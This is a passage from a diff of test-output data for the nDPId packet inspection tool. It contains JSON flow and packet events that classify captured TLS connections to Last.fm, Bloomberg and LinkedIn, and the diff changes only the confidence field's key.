00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1646482802726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802726,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8b+kAAHkGetkjyXCIwKgBgAG7uBJNy0p52hKBtKAS\/\/9IWQAAAgQFlgQCCArHroD1wGTyVwEDAwg="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1646482802732,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482802732,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5g6xAAEAGXpnAqAGAI8lwiLgSAbvaEoG0TctKeoAYAfa\/ZwAAAQEICsBk8mLHroD1FgMBAgABAAH8AwM6s1cKgDvTG3LALyk7fAmvRJX9DNZN37XWMNl1\/SdHaCCUR56oKGM2UcODstsWkptKjiMgLAJPLuO56cI3NFuiCgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1rZXJ2ZS5sYXN0LmZtABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIEXwFTh8NFdQPbVwjRz3qZyMML4Z+FJITLECgKzAH2YhABcAQQROHWQ9TZ\/FNyVoueylOLPpt31B2wF8YuKZg+41\/WG\/Ucaum9xuzZgJXugnVJqsHgtbN0plSfDPGhyRi1GNW\/CAACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482802720,"flow_last_seen":1646482802732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482802732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482802742,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482802720,"flow_last_seen":1646482802732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482802732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482802742,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482825245,"flow_last_seen":1646482825245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482825245,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1646482825245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482825245,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBNAAEAGurHAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vDCpAAAAgQFtAQCCArIaWrDAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1646482826257,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482826257,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBRAAEAGurDAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC+sAAAAgQFtAQCCArIaW63AAAAAAEDAwc="} 
@@ -166,46 +166,46 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1646482844787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8DedAAEAGEf7AqAGAl2XBSamUAbtMTKsLAAAAAKAC+vDPdgAAAgQFtAQCCApUsmtnAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1646482844795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844795,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJuWXZcFJwKgBgAG7qZRSHsTXTEyrDKAS\/\/9OHAAAAgQFTAQCCAoo5zzDVLJrZwEDAwk="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1646482844798,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482844798,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5DelAAEAGD\/\/AqAGAl2XBSamUAbtMTKsMUh7E2IAYAfYA+gAAAQEIClSya3Io5zzDFgMBAgABAAH8AwORBDzSmJ5ztCo20SFZ11gW0AoQQ4sgaFZaA3Y+KP\/wXyDr7yv9lTOmWoS6i6wF3DRKGiQ0dwIiiuA6PbPxGRgIZwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABF3d3cuYmxvb21iZXJnLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDquIWld0x6v\/7S4zdZ49LOkRXJqmmpTXYEodSal6cCHwAXAEEEAIPYMeBzwG1ajydlfuoJM30LuOrUqddbx+YHyLZsEMUExIIuEeju0UTUsS5CFNGsqSGbD968lENk0xLpNURtmQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482844787,"flow_last_seen":1646482844798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482844798,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":399,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","server_names":"www.bloomberg.com,api.businessweek.com,api.bwbx.io,assets.bwbx.io,byzantium.bloomberg.com,cdn-mobapi.bloomberg.com,cdn-videos.bloomberg.com,cdn.gotraffic.net,charts.bloomberg.com,embeds.bloomberg.com,fastly.bloomberg.tv,feeds.bloomberg.com,fonts.gotraffic.net,staging-assets.bwbx.io,nav.bloomberg.com,sponsored.bloomberg.com,spotlight.bloomberg.com,tictoc.video,www.bbthat.com,www.bloomberg.co.jp,www.bloomberg.co.jp.shared.bloomberga.com,www.bloomberg.com.shared.bloomberga.com,www.bloombergview.com,www.citylab.com,www.citylab.com.shared.bloomberga.com,www.quicktake.video,www.tictoc.video,cdn-api.cmobile.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=New York, L=New York, O=Bloomberg LP, 
CN=www.bloomberg.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"88:4A:85:34:1D:E6:C0:BE:5E:C6:14:BB:BA:94:A3:55:92:BA:95:82"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482844787,"flow_last_seen":1646482844798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482844798,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":399,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","server_names":"www.bloomberg.com,api.businessweek.com,api.bwbx.io,assets.bwbx.io,byzantium.bloomberg.com,cdn-mobapi.bloomberg.com,cdn-videos.bloomberg.com,cdn.gotraffic.net,charts.bloomberg.com,embeds.bloomberg.com,fastly.bloomberg.tv,feeds.bloomberg.com,fonts.gotraffic.net,staging-assets.bwbx.io,nav.bloomberg.com,sponsored.bloomberg.com,spotlight.bloomberg.com,tictoc.video,www.bbthat.com,www.bloomberg.co.jp,www.bloomberg.co.jp.shared.bloomberga.com,www.bloomberg.com.shared.bloomberga.com,www.bloombergview.com,www.citylab.com,www.citylab.com.shared.bloomberga.com,www.quicktake.video,www.tictoc.video,cdn-api.cmobile.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=New York, L=New York, O=Bloomberg LP, 
CN=www.bloomberg.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"88:4A:85:34:1D:E6:C0:BE:5E:C6:14:BB:BA:94:A3:55:92:BA:95:82"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482845216,"flow_last_seen":1646482845216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482845216,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1646482845216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845216,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZOJAAEAG1L\/AqAGAbIvSZt62AbvYtDuvAAAAAKAC+vDuhAAAAgQFtAQCCAq3z7DKAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1646482845236,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845236,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8MSYAAPgGkHtsi9JmwKgBgAG73rYdOl\/82LQ7sKAS\/\/9A+gAAAgQFoAQCCAoefQzKt8+wygEDAwg="} 
01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1646482845241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482845241,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZORAAEAG0sDAqAGAbIvSZt62AbvYtDuwHTpf\/YAYAfbCEAAAAQEICrfPsOMefQzKFgMBAgABAAH8AwNDaq9+o2\/m1P9XaJsuL18rMu\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"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482845216,"flow_last_seen":1646482845241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482845241,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":406,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482845260,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482845216,"flow_last_seen":1646482845241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482845241,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":406,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482845260,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482860064,"flow_last_seen":1646482860064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482860064,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1646482860064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482860064,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8zthAAEAGckLAqAGADWsqDr4OAbv2xGogAAAAAKAC+vA6VgAAAgQFtAQCCArF2TKPAAAAAAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1646482860089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482860089,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0KdNAAHUG4k8NayoOwKgBgAG7vg7o0cSg9sRqIYAS\/\/+nUAAAAgQFoAEDAwgBAQQC"} 01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1646482860092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482860092,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItztpAAEAGcE\/AqAGADWsqDr4OAbv2xGoh6NHEoVAYAfY2twAAFgMBAgABAAH8AwN91wMalwKbnp34VhS8QvEFPozBOcSHhaFoSNBfPba3AiDXrrHLYmT\/nToyiJxYmouQzlobVBifJMUtdUWk4ZdOUAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABB3d3cubGlua2VkaW4uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOvcUoPBHSJ9xxKLt05ZOdwqxB4X188WUTuTKbETRNVIABcAQQSw33BhIovc8GgXm9sGLVvnRexF7f826PClnfuvUvruR3Sq4irZ9toHOp2agzdKIN0AwGPF8iqx1fv+O3\/0IjBNACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBA